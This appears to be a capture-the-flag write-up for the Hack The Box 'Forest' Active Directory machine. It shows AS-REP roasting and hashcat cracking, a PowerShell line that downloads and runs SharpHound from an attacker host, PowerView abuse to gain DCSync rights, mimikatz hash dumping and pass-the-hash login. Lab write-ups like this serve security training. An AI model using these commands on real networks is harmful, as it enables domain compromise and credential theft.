Forest
Adopt the pace of nature!
Forest is an easy difficulty machine running Windows. It tests your knowledge in Basic enumeration and privelege escalation using common commands as well as using tools such as Bloodhound.
Be sure to checkout the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan forest.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-07 14:53 GMT
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-07 07:00:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5h13m08s, deviation: 4h37m12s, median: -7h53m11s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2019-11-06T23:03:07-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-11-07T07:03:05
|_ start_date: 2019-11-07T06:39:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 300.76 secondsFrom our scan we can see a few things that may be of interest. We have SMB, Kerberos and WinRM which can all be useful in us gaining access.
Enum4Linux
Let’s see if we can grab any useful info:
enum4linux forest.htb > enum4linux.txtWe can then check to see if we have found any users:
cat enum4linux.txt | grep -i users
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\Administrator
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\sebastien
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\lucinda
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\andy
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\mark
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\santiLooks like we have found a few… Nice! Let’s make a list of just the usernames and all the other junk taken out.
User
Since we have usernames but we don’t have any passwords let’s see if any of the users are set without Kerberos pre-authentication required. This is called ASREPRoasting and we will use one of impackets examples for this:
GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproastChecking our output file we see that we have grabbed a hash:
cat hashes.asreproast
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d36a3e9c1a66....fedc13432f1$981ae7bbc66fa7e5b60ef5cbd49a1c66709cf03165607db827c1af40deae1f2d8470aac43a226907
2020340bdbd2e1e8752ee190cc3ef007aa8db1a0e4ad5871bf80f874b6add353ed0c87950c9e5ed2b3b9d9bb4a41862cc417f24ef109cd97d1fd79c2c4cea7751bd674d60bc772d31
9ffac306c07c788bac33bba6021acd61ed849e0dcee....a58d61b36ffdf5c1127bb1c115b53c48071328d9bcd5cc9bf0dd021e56ff3fa2aa4e98a113b465982a127d60fa4960c0d3
8d7b6e45975f95fbd45ccf....84f1ea0bf47473f8e3aac56518fc263c7407d67fb6bea4074b98cLet’s try and crack the hash:
hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6800K CPU @ 3.40GHz, 2048/5918 MB allocatable, 4MCU
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 6 secs
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade578c169b14a26203f5$49f40b19377f04ea05fc9474c79e3e0242685fb533b0e2c7ad6e41b688221def0bcbf0caa7e
588c01e01132495dd8bc9ec3f5c3afba95bc891f64e18fcb666831f23a0bf2aff1860e36f1c06588ac89182b37980938d9b97a3876b7096434de2f08bc7b8885e974d5f6529dc9e0f
fd174a6b23460d0e5c76ba2c2613506c1be1fbbf678464980af717d9fe576fe77310ff97442eb205e18a380b539199658b40246634714bad41808ff2e6542ac86a5e64b94073c1f4b
40d83d6fe6d84dab9ecfed80a14301c935276f16db4d35f83f264a460450ab1d248e34bbc7d7904883ce4fd505d1ec0:s3....ce
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade...5d1ec0
Time.Started.....: Sun Nov 10 13:54:23 2019 (8 secs)
Time.Estimated...: Sun Nov 10 13:54:31 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 543.7 kH/s (6.04ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4087808/14344385 (28.50%)
Rejected.........: 0/4087808 (0.00%)
Restore.Point....: 4079616/14344385 (28.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: s9039554h -> s2704081We have valid credentials! Let’s go see if we can login via WinRM:
PS htb\svc-alfresco@FOREST Documents> cat ../Desktop/user.txt
e5e4e47ae7....013fb0d9edWe have the user.txt flag. Let’s move on to root!
Root
Taking a look at the groups our user has we see that we have a couple of interest:
PS htb\svc-alfresco@FOREST Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================ ====== ============================================= ==================================================
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled groupTo find a path to own the Domain Administrator we will use Bloodhound.
We grab the data we need by using Sharphound:
PS htb\svc-alfresco@FOREST Documents> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker-ip>/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All -SearForest -Domain HTB.LOCAL -DomainController FOREST.HTB.LOCAL -LDAPUser svc-alfresco -LDAPPass s3....ce -ZipFileName bloodhound.zip -Verbose"
Initializing BloodHound at 7:49 AM on 3/21/2020
Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for HTB.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for htb.local : FOREST.htb.local
EXCH01.HTB.LOCAL did not respond to ping
Status: 123 objects enumerated (+123 61.5/s --- Using 148 MB RAM )
Finished enumeration for HTB.LOCAL in 00:00:02.6399943
1 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc-alfresco\Documents\bloodhound.zip.
You can upload this file directly to the UI.
Finished compressing files!We can then download bloodhound.zip and load it into Bloodhound by going over to the right side and selecting Upload Data from the vertical menu.
On the left side we see Database Info and to the right of that we click on Queries, then select Find Shortest Paths to Domain Admins.
This gives us a nice overview of the path we need to take:
As we expected we move through the groups we saw earlier until we see that we are also in the Account Operators group with GenericAll permissions. We also see the Exchange Windows Permissions group which would give WriteDacl privileges.
If we hover over GenericAll we can right click and select Help:
From here we get literal instructions to add ourselves to the Domain Admins group with PowerView which seems a little too hopeful. Downloading PowerView to the victim machine and trying this results in Permission Denied.
Using the Exchange Windows Permissions group instead we get some success:
PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'svc-alfresco' to group 'Exchange Windows Permissions'We see that we have been added to the group when we check with net user svc-alfresco. However, after some time it disappears. Meaning the account is reset to avoid spoilers.
So we will try and create another account and add that user to the Exchange Windows Permissions group:
PS htb\svc-alfresco@FOREST Documents> $SecPassword = ConvertTo-SecureString 's3....ce' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS htb\svc-alfresco@FOREST Documents> $UserPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> New-DomainUser -SamAccountName sabe -AccountPassword $UserPassword -Credential $Cred -Verbose | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred -Verbose
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [New-DomainUser] Attempting to create user 'sabe'
Verbose: [New-DomainUser] User 'sabe' successfully created
Verbose: [Add-DomainGroupMember] Adding member 'CN=sabe,CN=Users,DC=htb,DC=local' to group 'Exchange Windows Permissions'Oh and we almost forgot! Add your new user to the Remote Management Users group:
PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Remote Management Users' -Members 'sabe' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'sabe' to group 'Remote Management Users'Now let’s login with our new user.
Going back to Bloodhound if we hover over WriteDacl we can right click and select Help once again:
Again we get instructions on how to give ourselves DCSync writes which will hopefully allow us to extract hashes of the Domain Administrator.
Let’s try doing this with the user we just created:
PS htb\seth@FOREST Documents> $SecPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\seth@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\sabe', $SecPassword)
PS htb\seth@FOREST Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "dc=htb,dc=local" -PrincipalIdentity sabe -Rights DCSync -VerboseNow we can use mimikatz to extract the Administrator hash:
PS htb\sabe@FOREST Documents .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/18/2019 10:09:08 AM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6....72a07ceea6We can now login using the NTLM Hash:
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6....72a07ceea6
Evil-WinRM shell v2.0
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f048153f20....04d79129ccNow that was an interesting one!
Conclusion
This box was really fun to do and fun to help people with as well. The concept was real world in the sense of misconfigurations that can help an attacker gain unauthorized access to a machine.
